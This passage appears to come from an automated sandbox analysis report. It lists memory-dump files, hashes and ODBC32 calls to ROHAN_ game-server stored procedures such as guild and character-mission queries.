                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_SetTNGuildNotice](?, ?)}
                                                                                      • API String ID: 0-2045539017
                                                                                      • Opcode ID: 3af372faad13633c7022b6da74fa067e679f7fce53d7c7634da3a01c051d59f6
                                                                                      • Instruction ID: 83d8d9e3ac75bddcb8201c21d0b34fc3242e75a2f12277addd0b1e01748c3f15
                                                                                      • Opcode Fuzzy Hash: 3af372faad13633c7022b6da74fa067e679f7fce53d7c7634da3a01c051d59f6
                                                                                      • Instruction Fuzzy Hash: 372121B0A45618ABEB24CF44CC51FAB7375FF89715F108289F618AF2C5D671AD408F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_CompleteCharMission] (?, ?)},000000FD), ref: 00442796
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004427D5
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0044280A
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00442842
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_CompleteCharMission] (?, ?)}, xrefs: 0044278D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_CompleteCharMission] (?, ?)}
                                                                                      • API String ID: 0-2709835756
                                                                                      • Opcode ID: ffc779b9437d2e93a98b83d65a87f7d993b10126651bd9a7c4da32690eb840d7
                                                                                      • Instruction ID: a1bd9bce201a4be3220daa4e663255f0132f2136d9568cfd02fc2dd4aa5fe337
                                                                                      • Opcode Fuzzy Hash: ffc779b9437d2e93a98b83d65a87f7d993b10126651bd9a7c4da32690eb840d7
                                                                                      • Instruction Fuzzy Hash: CB2103B4A40315ABEB24CF44CC92FDA73B5EB44714F20819DF6186F6C5D6716E418F48
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_DelGuildWar](?,?) } ,000000FD), ref: 004287F6
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00428849
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042887E
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004288B6
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_DelGuildWar](?,?) } , xrefs: 004287ED
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_DelGuildWar](?,?) }
                                                                                      • API String ID: 0-1683640527
                                                                                      • Opcode ID: 2355a40967b8f6eef2421587ff9e668f63d32dd34fb2dc67386bab1637ad1d80
                                                                                      • Instruction ID: f8f9185c1f47088625efbae086c2d32af69b6916e850b5ef5be82e1e9e0973ba
                                                                                      • Opcode Fuzzy Hash: 2355a40967b8f6eef2421587ff9e668f63d32dd34fb2dc67386bab1637ad1d80
                                                                                      • Instruction Fuzzy Hash: 4F2103B0A50718BFEB25CF44CC52FAA7378EB44B19F14C289F6186E2D4D6B56E408F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?, {? = CALL [ROHAN_DelIndunRestrictInfo] (?, ?)},000000FD), ref: 0043B39F
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043B3E1
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043B416
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043B44E
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_DelIndunRestrictInfo] (?, ?)}, xrefs: 0043B396
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_DelIndunRestrictInfo] (?, ?)}
                                                                                      • API String ID: 0-724595896
                                                                                      • Opcode ID: 0addc4d57938ad7a5c05c8ae48360b53d5035cbd2388c157dceb7f462f1de2df
                                                                                      • Instruction ID: 5c2b3f5384d84b7d0e91806d4a5862592311c0ce3c3bb5df0e5103a94e33bffc
                                                                                      • Opcode Fuzzy Hash: 0addc4d57938ad7a5c05c8ae48360b53d5035cbd2388c157dceb7f462f1de2df
                                                                                      • Instruction Fuzzy Hash: 592106B1650254ABEB24CF44CC52FA97375FB84718F14868AF7187E2C4D6F66D408F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_GetNGuild] (?,?) } ,000000FD), ref: 00424763
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00424793
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004247BF
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004247EB
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_GetNGuild] (?,?) } , xrefs: 0042475A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_GetNGuild] (?,?) }
                                                                                      • API String ID: 0-2583683699
                                                                                      • Opcode ID: a077adedb49ead1142c0b4670b369198823f5e71d1a6c08dee7b5089639d5126
                                                                                      • Instruction ID: 6bb08db0ccc9a0cd396aacf9559b00ee7543fa87f0df4d9a3ed4f474c9cd20f6
                                                                                      • Opcode Fuzzy Hash: a077adedb49ead1142c0b4670b369198823f5e71d1a6c08dee7b5089639d5126
                                                                                      • Instruction Fuzzy Hash: 1021B3B1A44608ABEB24DFA4CC52F9D7775EB44B18F30820DF7206F2C6D6B568508F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_GetNGuildMark] (?,?) } ,000000FD), ref: 004249AA
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004249E9
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00424A21
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00424A59
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_GetNGuildMark] (?,?) } , xrefs: 004249A1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_GetNGuildMark] (?,?) }
                                                                                      • API String ID: 0-2801385250
                                                                                      • Opcode ID: 3c43a63b4b21234b863cc82aab380b39b33048c48b7dc6567e6b4066017ee314
                                                                                      • Instruction ID: 0e69e4e140e0ffdc81192e8c226cc7ffb4c481c02f3af244afeb26c351eb74ef
                                                                                      • Opcode Fuzzy Hash: 3c43a63b4b21234b863cc82aab380b39b33048c48b7dc6567e6b4066017ee314
                                                                                      • Instruction Fuzzy Hash: E12110B4B40318BFEB24CF44CC42F9A7375EB85B18F208289F7586E2C4D6B169808B59
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_GetNGuildMember] (?,?) } ,000000FD), ref: 00424B36
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00424B75
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00424BAD
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00424BE5
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_GetNGuildMember] (?,?) } , xrefs: 00424B2D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_GetNGuildMember] (?,?) }
                                                                                      • API String ID: 0-36928725
                                                                                      • Opcode ID: 0d7b73f0d4d101ca97b3a282293214d086c36c6232eb0cc592c1141f9467978c
                                                                                      • Instruction ID: 8045ebdab601a7f89cfdbaafbad4baf82b2d836bff979fee6efa642803b271ee
                                                                                      • Opcode Fuzzy Hash: 0d7b73f0d4d101ca97b3a282293214d086c36c6232eb0cc592c1141f9467978c
                                                                                      • Instruction Fuzzy Hash: 4121E0B0A41219ABFB64DF44CC52F997375EB44B14F208389F71C6B2C4D6B169848F5C
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_ChangeNGuildMaxMasterRank](?,?) } ,000000FD), ref: 0042807E
